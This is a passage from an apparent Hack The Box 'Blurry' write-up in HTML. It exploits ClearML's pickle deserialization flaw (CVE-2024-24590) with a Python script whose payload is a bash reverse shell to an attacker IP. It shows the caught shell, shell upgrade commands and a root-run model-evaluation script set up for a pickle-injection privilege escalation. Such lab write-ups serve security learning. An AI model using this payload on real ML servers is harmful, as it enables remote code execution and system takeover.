url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAASCAYAAABb0P4QAAAACXBIWXMAAAsTAAALEwEAmpwYAAAEB0lEQVR42l2U309bdRjGa9TBCu36u+ec/m5p6WkpLRS61rZshf0AZRUoAgM6Bm5yWMsMpVB+Z7C1wo3OzQsjV8bEmcBcNFkmJjpNdImJU2/9ax7fnhYGXnxz0ot+8rzv8zyvxBovwRLbgvmtDZjCKzCGFmFomwfbehtMSwaMX4Cu6QZ0nuvQuMehcg5D6RjEGVsf5NZeyMzdqDdegJQ7j9P6OCS2eBGWOAEj6zCdXYahfRFcMFcB+gRo+Smo+UkoXWkonCMiUOFIVYAWApouo97QBSlTBsYgsRLQTEATKTQT0NS+UAH6M2CjeViTd2FpE2AO3oQpQOAjYJKAb4vAOhF4rgqM3YMleofeOszhJRjb8zR2Dow3i+bxRSTy24hdWUe0t4BwTx469xBUjiTOWHto1Iuoo3HrDJ0E7DgE3qX93aG3SqACuLY89P7bUPIC6l1jkPuG8KZxGG9wA3hN2w2J+jwkig6c0neSOgJyCXo07kkgjRtZA9degCu+gicHL/Hiz3/x7Pk/OPiZ3i9/4eD5S/zw0x94+uPv+PXF37iVv4/XtQnITaSQpXGZeBUYrTpM+9PT3oytArKFL7FWfIzV0hOsffQd1rcfY6X4CMs7+1jafISN0h4up1ZRw3SJKqUiMHaocEuMi775BlSNaRhahrH4BYvSvgxb3yhQ3NNg7jMVCrsyFPfl2Pxaju1va9EruHFK+w5kRjKE7XgFtEQ3KWu3oPVcg645A2ski9mPE1jZDWP+QSvm7nsxfY9HZodH7lMv5j5pwvLnPC6Mh1GjKxvTeRJoCq9C650ihQIMoQXKXw719nnI6DG+BWgbBWicE1DZ0+KrN45BIusndb0Vl8kQKVvZnwgsN0PrvU6tmKVQUwZbPwRHDeFaBDJoEg2RPthDSTjCKfr2Qu/uoXZchNzcBbW94rCUOQY0nV0SgfrmaRHIEpAJZETFStc41asPigaqm3OUwvwe/X63GuhL5HBXpXLHgebIBv35A2j4NO1yBiwp1dNXw1+DsmEAcls/5A0jkNlSkNv7obD3kcJy5boJRh1mKx1+BaTIGKgdGs8ElX+scgAarxIsRb0dgjMyA3d0BnyUJvCNksIkHQfaH1VOY6Vwc+dQW4VVTaGjEF6m/s6JV6WsVM2PiQpZitLOwz3sfvUU3z/7DaM3S6hhe8ikJAEvQUkZlNHItfroMYXhNbFyoiEEZQNZ6HzTNLYAPjiNICn0d84iEJuELTgFg3eI+tt91OPTFGopRUZ6PDbG0FL1BpIh5bYEs7CFMnRhpmEMvA9D8wQYzyg0rkEYmkbAuPtFU6T/c7jq8uFRyB05zAVmqDECOH8ZNgnWl4becxVq5yC0rgGoHVeoIWVg4oTDZeB/Lfpl20HAJlsAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="ClearML login" title="" src="/static/ca05d2f829b3b1aa5a15fe4c44db054c/50637/clearml-login.png" srcset="/static/ca05d2f829b3b1aa5a15fe4c44db054c/dda05/clearml-login.png 158w, /static/ca05d2f829b3b1aa5a15fe4c44db054c/679a3/clearml-login.png 315w, /static/ca05d2f829b3b1aa5a15fe4c44db054c/50637/clearml-login.png 630w, /static/ca05d2f829b3b1aa5a15fe4c44db054c/2fe53/clearml-login.png 674w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>I signed up for an account which brought up the dashboard:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/694162c1abcde2b605450d76efb292bd/48cc5/clearml-dashboard.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 81.0126582278481%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAQCAYAAAAWGF8bAAAACXBIWXMAAAsTAAALEwEAmpwYAAAC/UlEQVR42n1UaU9TURB9v0EEurfvdXl739LlrV1oaVmiKAZLA0KBoFFjYoz+Cf1CYoz+3OPMLQXRxA+TO+/emTNnZk4rOYczlKouHD9Gte4iW9CRL5tYz1TxeFPB2loZBduDNZzC0NvI5BtY25DF26P1MllFxCqNDhpmCmmwH6GquciXbMh1D1W1LawoO8iVTGSoQLako1gxKcZEtqiLu0xBo7wYpjshoIGIzZcsSMl4jx462Mhp0JpDWP6YAiIoaoBytY2C4qEgk1U8KFpCp0vfRIAKqvYIbvcp9OaYAC1hUjuZUXJIgA04wXP0pm/gx3O001O0+2cIoyOE8QyGt09vr9GbXCMZX6HTe4VWMhexTnB4D9iKnkFuBNjMq5S0h6sP37H74guC4TnSdI7G4ieMy18w9T4mzz7h7O0Nwq0LRFsLhMMLpNuX6A5O7gH9kAG7d4Dn725EYkQskv4JzMUPOJcEagwwPviIk+tvBLAgttcIRxfoT98Ty1OxyGXL8SEtoyta1t0pvPiY2p0vGZDF6QxJekxvO/CofZ/aD4dniEbnYizjg1N8/urTbHlRBBj0Z7SUiLbYRE2PoNt91PWYFtMTpqiRmHGp6pM0AooNUTdSWuAANW2M3ZcO9udN5Iq0QLkJqZMeQbV6MJoJLLcP00lRUhySB7VQXLaRL9tklpAWf7NsuIDdmlLRERWZwPQnYheS4W5T5S4qtZbQXklxiRF/+yQbT5zMmE/uQK63xT37CvlcvEayk2vctg3Jbu2gUu8ILaomJ7RI2B3BWLcTUUCzYiraFtYwQnHHcRxfpl9ZlnSaVWPkytSy5U8FYE3rikQOZN90eAypYMPgXITfGHDFXPh0Vmk0Co0jy1tmQJkA6/r/AFMByMaseDTMln1mmyOGuUb0L0P1FpATGZBbZkA+GWAFyEu6AyRwbjmjJreANEMWdl0PHjDkjTMzbo1PHvzfMWK25Odkn2ZIgCQ9qZs+EX89LBOuvPoJLaViP/D/vFvdr/zcraR+Awo+8XMNmU9iAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="ClearML login" title="" src="/static/694162c1abcde2b605450d76efb292bd/50637/clearml-dashboard.png" srcset="/static/694162c1abcde2b605450d76efb292bd/dda05/clearml-dashboard.png 158w, /static/694162c1abcde2b605450d76efb292bd/679a3/clearml-dashboard.png 315w, /static/694162c1abcde2b605450d76efb292bd/50637/clearml-dashboard.png 630w, /static/694162c1abcde2b605450d76efb292bd/fddb0/clearml-dashboard.png 945w, /static/694162c1abcde2b605450d76efb292bd/48cc5/clearml-dashboard.png 1005w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Viewing the Black Swan project mentioned in the announcement from <code class="language-text">jippity</code> showed a list of experiments. "Review JSON Artifacts" looked to be the specialized task that reviews artifacts associated with tasks:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/b372fe268a3825f9db22a613161908f2/c0d05/clearml-black-swan-experiments.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 66.45569620253164%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAANCAYAAACpUE5eAAAACXBIWXMAAAsTAAALEwEAmpwYAAAC0ElEQVR42m1TS08TURgdE9dGoy20te08+p629DF0OqWl0UKkENAFwQ2EaCLqQtxp0I2iUQzxr7jUnQnxufFBqEZDsS013WAwvIShU47fTMFA5CYn332ee8733cuEe/pg50JwcEG4fXE4+TBOtQgwWVxGbLXwYHkOrMDBYuPR0irAahVgsehrTVhtHji5MDw+GYyknAfvTULwKfAGOxFuz8PGhmF1iHAIMbBiJyJZCVJ3DK62DOz+DI6xMk4ICqweBXavgtMEls46xTSYjq4s/KEUPDTwhbJw+ZLwiimwLonm03g+8xHv5sqY+TCPt7MLeF0oY+JFGTeeFfHy0wLezBbx6vM87fmB94USmIjci54L4xgZm8bwlSkMjz3B0OhD6k+jZ+AaarUa9KaqGhpaAzs7+DfW+9vbGqGOvQUmJOWR67uOi5cfY3D0AQZHJo04dGkK5wauolr9iZU1YHVdg0oHt9Q6kdVRr2uo0wUqEep9rdEwwETlfgjedri8Enwi2Q0q4CjB9hY3WU9isVrD5qaKRmNX2r72/wwpTGQG4RTiVIAoxRgcfBScOw6bI0g5VAxCVd0mwoahRLe4Q/YOg0EYTfZTIWRSoyDQloZIlWQ9Ekx8AmI0i3KlipXVdWxtqVhd+4ONjU1omnYo9EuZQCRnqDIgNCPritOzCcFH9peWfjXtGSoOt3nAshjtphwmmgrDusI0OFJo5tsRiHSiUPiGL1/nMVf4jmKxhMpiFZXKImEvNlEqlbG8/LtJqOfOuZtDPbKuGEw2EUomj9t37sHtjUFO5RBqU+g3xOH2x+HZh0BIhsXuxaOppzphl6HQE0g2FRJYt4ST9ihS2X6M37wFM31DfzBBL4Eu5UNUMD9Mrbwxb6KveNLM4cjR45i4ex9MXOml3EWM3O1VmaUqm61+KOk8bZo0yJIdXUgkzyKh5CDJZ5AkxVEpQwLkAwr/AoCMc8Sesh2PAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="ClearML Black Swan experiments" title="" src="/static/b372fe268a3825f9db22a613161908f2/50637/clearml-black-swan-experiments.png" srcset="/static/b372fe268a3825f9db22a613161908f2/dda05/clearml-black-swan-experiments.png 158w, /static/b372fe268a3825f9db22a613161908f2/679a3/clearml-black-swan-experiments.png 315w, /static/b372fe268a3825f9db22a613161908f2/50637/clearml-black-swan-experiments.png 630w, /static/b372fe268a3825f9db22a613161908f2/fddb0/clearml-black-swan-experiments.png 945w, /static/b372fe268a3825f9db22a613161908f2/c0d05/clearml-black-swan-experiments.png 1166w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>The ClearML version <code class="language-text">1.13.1</code> can be found on the settings page:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 358px; " > <a class="gatsby-resp-image-link" href="/static/aea3f9e2b6ca92e276aea6a3c010927b/46af1/clearml-version-settings-page.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 17.72151898734177%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAECAYAAACOXx+WAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAkElEQVR42m2QXQ6DIBCEuYZVFgR9qf1Tau9/s+kOiNqkD5MNO99OMpjGXlE04XISd3VWv7G3wsm08/utFBk/fuCGFRIWdP0LEhfYMMOPuospy8W3+jOs+m5ImaXPd6/35J1ynX8ycAVDOTv/yCaDCTBEQirhGtJufg2wG8dJtnV3mJ/KcuiofKr1t3L5ilr5CwcJcNbcX3XhAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="ClearML version" title="" src="/static/aea3f9e2b6ca92e276aea6a3c010927b/46af1/clearml-version-settings-page.png" srcset="/static/aea3f9e2b6ca92e276aea6a3c010927b/dda05/clearml-version-settings-page.png 158w, /static/aea3f9e2b6ca92e276aea6a3c010927b/679a3/clearml-version-settings-page.png 315w, /static/aea3f9e2b6ca92e276aea6a3c010927b/46af1/clearml-version-settings-page.png 358w" sizes="(max-width: 358px) 100vw, 358px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Searching for vulnerabilities related to version <code class="language-text">1.13.1</code> led me to <a href="https://nvd.nist.gov/vuln/detail/CVE-2024-24590" target="_blank">CVE-2024-24590</a>, and <a href="https://hiddenlayer.com/research/not-so-clear-how-mlops-solutions-can-muddy-the-waters-of-your-supply-chain/" target="_blank">this</a> article from HiddenLayer which provides more detail on CVE-2024-24590.</p> <p>So next, I started a virtual environment and installed <code class="language-text">clearml</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Blurry] └─$ python3 -m venv venv ┌──(kali㉿kali)-[~/Desktop/HTB/Blurry] └─$ source venv/bin/activate ┌──(venv)─(kali㉿kali)-[~/Desktop/HTB/Blurry] └─$ pip install clearml</code></pre></div> <p><code class="language-text">clearml-init</code> runs the setup script which requires credentials:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(venv)─(kali㉿kali)-[~/Desktop/HTB/Blurry] └─$ clearml-init ClearML SDK setup process Please create new clearml credentials through the settings page in your `clearml-server` web app (e.g. http://localhost:8080//settings/workspace-configuration) Or create a free account at https://app.clear.ml/settings/workspace-configuration In settings page, press "Create new credentials", then press "Copy to clipboard". Paste copied configuration here:</code></pre></div> <p>As per the instructions, I went to the settings page and chose "Create new credentials":</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/37911f870e408c15ac0a2c0cebc76ab9/06b13/clearml-create-new-credentials.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 56.9620253164557%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAALCAYAAAB/Ca1DAAAACXBIWXMAAAsTAAALEwEAmpwYAAABS0lEQVR42q2S207CQBCG+wxGAj2fKC3tttClUFugpAKaeOMhGo0GExPf/xV+d7ckGBWMhosvk+10v5ndHSnfvEIPz2DZBK5P0fVTZJMFTIfgpGXitG0fpNVxIGsBwkGNIK4g5esreHGJttKDrIcCRcQ+Ohon2EWVRTX4Dsvr1gCalUAqqhdEwzWcXgbDSVmSyyKoZgyFIeukwSBQONvvX+F7OFJePSAcLuH1SyY+h+NPoNkDqNYQtjdCQiuk4xpxOocXlqxQ0oj3IGXlLWhxh+nyDdXlO7LZE2j5KDDcEUw3hR9NWcECPpmxNRWd7BVO5veswxV0h8LssmO7DWZ33Bzb4Jtj8XOzJoc7HBU3rHKFNrtcWQt3D2NEv27+UUiLayZcbCW7RNNN/HdhWT+zGVqKpz+KkN9hP6nFuBxFOF9tQOiFGNrPgv8KPwCSCjwZNwpDIQAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="ClearML Create new credentials" title="" src="/static/37911f870e408c15ac0a2c0cebc76ab9/50637/clearml-create-new-credentials.png" srcset="/static/37911f870e408c15ac0a2c0cebc76ab9/dda05/clearml-create-new-credentials.png 158w, /static/37911f870e408c15ac0a2c0cebc76ab9/679a3/clearml-create-new-credentials.png 315w, /static/37911f870e408c15ac0a2c0cebc76ab9/50637/clearml-create-new-credentials.png 630w, /static/37911f870e408c15ac0a2c0cebc76ab9/06b13/clearml-create-new-credentials.png 796w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/21a9df77becef877c71fbf9bd51a73dd/94f40/clearml-credentials.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 81.0126582278481%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAQCAYAAAAWGF8bAAAACXBIWXMAAAsTAAALEwEAmpwYAAAC1ElEQVR42oVUTWsTURTNQgUVbGsTSNNOMpPmO2mSTtLSpCEVCv4IQYQupNgPXdkguhFcCS51UauiRHHRnyAKFQUFV4I/wTZm0jaZyUxmkjm98yZpS1Pqg8O9896bM+e+e944hJk8nG4eYiaH7HQBheI8y+MTGSSSWYaJ1BSShN7zSVh7PWNhjBAcQiSNUEREtSrBGqZpEtCFyeYURYNMOLne6djrlX9V+IQYrgx6iDCUQziahVStHr7QG7186/sffPn6m+WdU9ZrtV34+KhN6AtQSeI11Hb3+gg1rUXqFEi1PVQqEmRZRqvVOpXQy1sKR+HgiTCWnGWT1tB13VZC5dTrCs3voyEraDZVIlQO1/sUCnEMDBGh1y8iSGcoSRJauoH9ugxrW1NtkeoGdvdkBlXTGWTZPk9ZUWG02/0lc+MiQtYZSnZTDMMgdR20aXNTNVBvGERksMY0ZJVFnT5sfdyKfYRCaJoR9rrcJjK7kyZIEBTVhG6YrBmdw+6f0RR/OEclZ9Bo1PHp8xaePnuOjdfvuyjj1Zsyi3Zuz73s5usb7/Dj5y866zo1JdItWUjDH0xTqTqW767h8rAHXDABrxCFEIiCH4/CNRLE4HAAQ64ABl12dLrJxOecWF4tkRs0cN6wTTjCxeEPpFj37pcewxdOoHh9HlO5IvKFIgpzcywmUuTX2AwicRuWM9xjMTx49ASqqh4RerwJRmgpXFpdw/mLbvhDCXi4CEa9lsIYVRCDj5RypNrrp8hP0DuTuHCJw8q9hycUEuF4KE0+U1D+sIlbCytYWikR1hjuHIM9V8Li6iLhNm4u3ED541so5E/OFzlS2PNhz9DHLsupQzc3sd9eJ7ygp2/U5QZ1uUfIJxEIi9j+u40OeU/TVLpeGivjLLR0je21PLuzU2E/h4GhMTgC5EH3aJB+Q1OYzOSRFnP/hZidxaSYZ/utPJXOwenicdXpwwFOVW/VOKJ23gAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="ClearML credentials" title="" src="/static/21a9df77becef877c71fbf9bd51a73dd/50637/clearml-credentials.png" srcset="/static/21a9df77becef877c71fbf9bd51a73dd/dda05/clearml-credentials.png 158w, /static/21a9df77becef877c71fbf9bd51a73dd/679a3/clearml-credentials.png 315w, /static/21a9df77becef877c71fbf9bd51a73dd/50637/clearml-credentials.png 630w, /static/21a9df77becef877c71fbf9bd51a73dd/fddb0/clearml-credentials.png 945w, /static/21a9df77becef877c71fbf9bd51a73dd/94f40/clearml-credentials.png 948w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>I copied the credentials above and then pasted them into the <code class="language-text">clearml-init</code> prompt to complete the setup.</p> <p>Next, I created the task. The HiddenLayer article contains a script which creates a malicious pickle that runs arbitrary code when it gets deserialized. I set the payload to be a reverse shell command:</p> <p><code class="language-text">exploit.py</code>:</p> <div class="gatsby-highlight" data-language="python"><pre class="language-python"><code class="language-python"><span class="token keyword">import</span> pickle <span class="token keyword">import</span> os <span class="token keyword">from</span> clearml <span class="token keyword">import</span> Task <span class="token keyword">class</span> <span class="token class-name">RunCommand</span><span class="token punctuation">:</span> <span class="token keyword">def</span> <span class="token function">__reduce__</span><span class="token punctuation">(</span>self<span class="token punctuation">)</span><span class="token punctuation">:</span> <span class="token keyword">return</span> <span class="token punctuation">(</span>os<span class="token punctuation">.</span>system<span class="token punctuation">,</span> <span class="token punctuation">(</span><span class="token string">"bash -c 'bash -i >&amp; /dev/tcp/10.10.14.26/443 0>&amp;1'"</span><span class="token punctuation">,</span><span class="token punctuation">)</span><span class="token punctuation">)</span> command <span class="token operator">=</span> RunCommand<span class="token punctuation">(</span><span class="token punctuation">)</span> task <span class="token operator">=</span> Task<span class="token punctuation">.</span>init<span class="token punctuation">(</span>project_name<span class="token operator">=</span><span class="token string">"Black Swan"</span><span class="token punctuation">,</span> task_name<span class="token operator">=</span><span class="token string">"shell"</span><span class="token punctuation">,</span> tags<span class="token operator">=</span><span class="token punctuation">[</span><span class="token string">"review"</span><span class="token punctuation">]</span><span class="token punctuation">)</span> task<span class="token punctuation">.</span>upload_artifact<span class="token punctuation">(</span>name<span class="token operator">=</span><span class="token string">"pickle_artifact"</span><span class="token punctuation">,</span> artifact_object<span class="token operator">=</span>command<span class="token punctuation">,</span> retries<span class="token operator">=</span><span class="token number">2</span><span class="token punctuation">,</span> wait_on_upload<span class="token operator">=</span><span class="token boolean">True</span><span class="token punctuation">,</span> extension_name<span class="token operator">=</span><span class="token string">".pkl"</span><span class="token punctuation">)</span></code></pre></div> <p>I started a listener with <code class="language-text">nc</code> and then ran the script:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(venv)─(kali㉿kali)-[~/Desktop/HTB/Blurry] └─$ python3 exploit.py ClearML Task: created new task id=4f0dc7ad1545453b9497e65d95c78680 2024-10-18 18:24:04,276 - clearml.Task - INFO - No repository found, storing script code instead ClearML results page: http://app.blurry.htb/projects/116c40b9b53743689239b6b460efd7be/experiments/4f0dc7ad1545453b9497e65d95c78680/output/log CLEARML-SERVER new package available: UPGRADE to v1.16.2 is recommended! Release Notes: ### Bug Fixes - Fix no graphs are shown in workers and queues screens ClearML Monitor: GPU monitoring failed getting GPU reading, switching off GPU monitoring</code></pre></div> <p>Once the task got reviewed after about a minute, <code class="language-text">nc</code> caught a shell as <code class="language-text">jippity</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Blurry] └─$ nc -lvnp 443 listening on [any] 443 ... connect to [10.10.14.26] from (UNKNOWN) [10.10.11.19] 59488 bash: cannot set terminal process group (4851): Inappropriate ioctl for device bash: no job control in this shell jippity@blurry:~$ id id uid=1000(jippity) gid=1000(jippity) groups=1000(jippity) jippity@blurry:~$ ls ls automation clearml.conf user.txt</code></pre></div> <p>I upgraded the shell with the following commands:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">python3 -c 'import pty; pty.spawn("/bin/bash")' export TERM=xterm Ctrl + Z stty raw -echo; fg</code></pre></div> <p>Checking <code class="language-text">sudo</code> permissions revealed that <code class="language-text">jippity</code> could run <code class="language-text">/usr/bin/evaluate_model</code> without a password on any PyTorch model file located in <code class="language-text">/models</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">jippity@blurry:~$ sudo -l Matching Defaults entries for jippity on blurry: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User jippity may run the following commands on blurry: (root) NOPASSWD: /usr/bin/evaluate_model /models/*.pth</code></pre></div> <p><code class="language-text">/models</code> contained a demo model and a python script:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">jippity@blurry:~$ cd /models jippity@blurry:/models$ ls -la total 1068 drwxrwxr-x 2 root jippity 4096 Jun 17 14:11 . drwxr-xr-x 19 root root 4096 Jun 3 09:28 .. -rw-r--r-- 1 root root 1077880 May 30 04:39 demo_model.pth -rw-r--r-- 1 root root 2547 May 30 04:38 evaluate_model.py</code></pre></div> <p>Example of running <code class="language-text">/usr/bin/evaluate_model</code> on <code class="language-text">demo_model.pth</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">jippity@blurry:/models$ sudo /usr/bin/evaluate_model /models/demo_model.pth [+] Model /models/demo_model.pth is considered safe. Processing... [+] Loaded Model. [+] Dataloader ready. Evaluating model... [+] Accuracy of the model on the test dataset: 68.75%</code></pre></div> <p><code class="language-text">/usr/bin/evaluate_model</code> was a bash script:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">jippity@blurry:/models$ file /usr/bin/evaluate_model /usr/bin/evaluate_model: Bourne-Again shell script, ASCII text executable</code></pre></div> <p><code class="language-text">/usr/bin/evaluate_model</code>:</p> <div class="gatsby-highlight" data-language="bash"><pre class="language-bash"><code class="language-bash"><span class="token shebang important">#!/bin/bash</span> <span class="token comment"># Evaluate a given model against our proprietary dataset.</span> <span class="token comment"># Security checks against model file included.</span> <span class="token keyword">if</span> <span class="token punctuation">[</span> <span class="token string">"<span class="token variable">$#</span>"</span> <span class="token parameter variable">-ne</span> <span class="token number">1</span> <span class="token punctuation">]</span><span class="token punctuation">;</span> <span class="token keyword">then</span> /usr/bin/echo <span class="token string">"Usage: <span class="token variable">$0</span> &lt;path_to_model.pth>"</span> <span class="token builtin class-name">exit</span> <span class="token number">1</span> <span class="token keyword">fi</span> <span class="token assign-left variable">MODEL_FILE</span><span class="token operator">=</span><span class="token string">"<span class="token variable">$1</span>"</span> <span class="token assign-left variable">TEMP_DIR</span><span class="token operator">=</span><span class="token string">"/models/temp"</span> <span class="token assign-left variable">PYTHON_SCRIPT</span><span class="token operator">=</span><span class="token string">"/models/evaluate_model.py"</span> /usr/bin/mkdir <span class="token parameter variable">-p</span> <span class="token string">"<span class="token variable">$TEMP_DIR</span>"</span> <span class="token assign-left variable">file_type</span><span class="token operator">=</span><span class="token variable"><span class="token variable">$(</span>/usr/bin/file <span class="token parameter variable">--brief</span> <span class="token string">"<span class="token variable">$MODEL_FILE</span>"</span><span class="token variable">)</span></span> <span class="token comment"># Extract based on file type</span> <span class="token keyword">if</span> <span class="token punctuation">[</span><span class="token punctuation">[</span> <span class="token string">"<span class="token variable">$file_type</span>"</span> <span class="token operator">==</span> *<span class="token string">"POSIX tar archive"</span>* <span class="token punctuation">]</span><span class="token punctuation">]</span><span class="token punctuation">;</span> <span class="token keyword">then</span> <span class="token comment"># POSIX tar archive (older PyTorch format)</span> /usr/bin/tar <span class="token parameter variable">-xf</span> <span class="token string">"<span class="token variable">$MODEL_FILE</span>"</span> <span class="token parameter variable">-C</span> <span class="token string">"<span class="token variable">$TEMP_DIR</span>"</span> <span class="token keyword">elif</span> <span class="token punctuation">[</span><span class="token punctuation">[</span> <span class="token string">"<span class="token variable">$file_type</span>"</span> <span class="token operator">==</span> *<span class="token string">"Zip archive data"</span>* <span class="token punctuation">]</span><span class="token punctuation">]</span><span class="token punctuation">;</span> <span class="token keyword">then</span> <span class="token comment"># Zip archive (newer PyTorch format)</span> /usr/bin/unzip <span class="token parameter variable">-q</span> <span class="token string">"<span class="token variable">$MODEL_FILE</span>"</span> <span class="token parameter variable">-d</span> <span class="token string">"<span class="token variable">$TEMP_DIR</span>"</span> <span class="token keyword">else</span> /usr/bin/echo <span class="token string">"[!] Unknown or unsupported file format for <span class="token variable">$MODEL_FILE</span>"</span> <span class="token builtin class-name">exit</span> <span class="token number">2</span> <span class="token keyword">fi</span> /usr/bin/find <span class="token string">"<span class="token variable">$TEMP_DIR</span>"</span> <span class="token parameter variable">-type</span> f <span class="token punctuation">\</span><span class="token punctuation">(</span> <span class="token parameter variable">-name</span> <span class="token string">"*.pkl"</span> <span class="token parameter variable">-o</span> <span class="token parameter variable">-name</span> <span class="token string">"pickle"</span> <span class="token punctuation">\</span><span class="token punctuation">)</span> <span class="token parameter variable">-print0</span> <span class="token operator">|</span> <span class="token keyword">while</span> <span class="token assign-left variable"><span class="token environment constant">IFS</span></span><span class="token operator">=</span> <span class="token builtin class-name">read</span> <span class="token parameter variable">-r</span> <span class="token parameter variable">-d</span> <span class="token string">$'<span class="token entity" title="\0">\0</span>'</span> extracted_pkl<span class="token punctuation">;</span> <span class="token keyword">do</span> <span class="token assign-left variable">fickling_output</span><span class="token operator">=</span><span class="token variable"><span class="token variable">$(</span>/usr/local/bin/fickling <span class="token parameter variable">-s</span> --json-output /dev/fd/1 <span class="token string">"<span class="token variable">$extracted_pkl</span>"</span><span class="token variable">)</span></span> <span class="token keyword">if</span> /usr/bin/echo <span class="token string">"<span class="token variable">$fickling_output</span>"</span> <span class="token operator">|</span> /usr/bin/jq <span class="token parameter variable">-e</span> <span class="token string">'select(.severity == "OVERTLY_MALICIOUS")'</span> <span class="token operator">></span>/dev/null<span class="token punctuation">;</span> <span class="token keyword">then</span> /usr/bin/echo <span class="token string">"[!] Model <span class="token variable">$MODEL_FILE</span> contains OVERTLY_MALICIOUS components and will be deleted."</span> /bin/rm <span class="token string">"<span class="token variable">$MODEL_FILE</span>"</span> <span class="token builtin class-name">break</span> <span class="token keyword">fi</span> <span class="token keyword">done</span> /usr/bin/find <span class="token string">"<span class="token variable">$TEMP_DIR</span>"</span> <span class="token parameter variable">-type</span> f <span class="token parameter variable">-exec</span> /bin/rm <span class="token punctuation">{</span><span class="token punctuation">}</span> + /bin/rm <span class="token parameter variable">-rf</span> <span class="token string">"<span class="token variable">$TEMP_DIR</span>"</span> <span class="token keyword">if</span> <span class="token punctuation">[</span> <span class="token parameter variable">-f</span> <span class="token string">"<span class="token variable">$MODEL_FILE</span>"</span> <span class="token punctuation">]</span><span class="token punctuation">;</span> <span class="token keyword">then</span> /usr/bin/echo <span class="token string">"[+] Model <span class="token variable">$MODEL_FILE</span> is considered safe. Processing..."</span> /usr/bin/python3 <span class="token string">"<span class="token variable">$PYTHON_SCRIPT</span>"</span> <span class="token string">"<span class="token variable">$MODEL_FILE</span>"</span> <span class="token keyword">fi</span></code></pre></div> <p>Viewing the code of <code class="language-text">/usr/bin/evaluate_model</code> showed that it checks the contents of a model for potentially malicious pickle files using <code class="language-text">fickling</code>, a Python decompiler and static code analyzer. If deemed as malicious, it deletes the model file; if considered safe, it runs <code class="language-text">evaluate_model.py</code> which tests the model for accuracy.</p> <p>There's another article <a href="https://hiddenlayer.com/research/weaponizing-machine-learning-models-with-ransomware/" target="_blank">here</a> from HiddenLayer about weaponizing PyTorch models which contains <a href="https://hiddenlayer.com/research/weaponizing-machine-learning-models-with-ransomware/#Pickle-Code-Injection-POC" target="_blank">this</a> PoC. The script injects arbitrary code into an existing PyTorch model, providing options—<code class="language-text">system</code>, <code 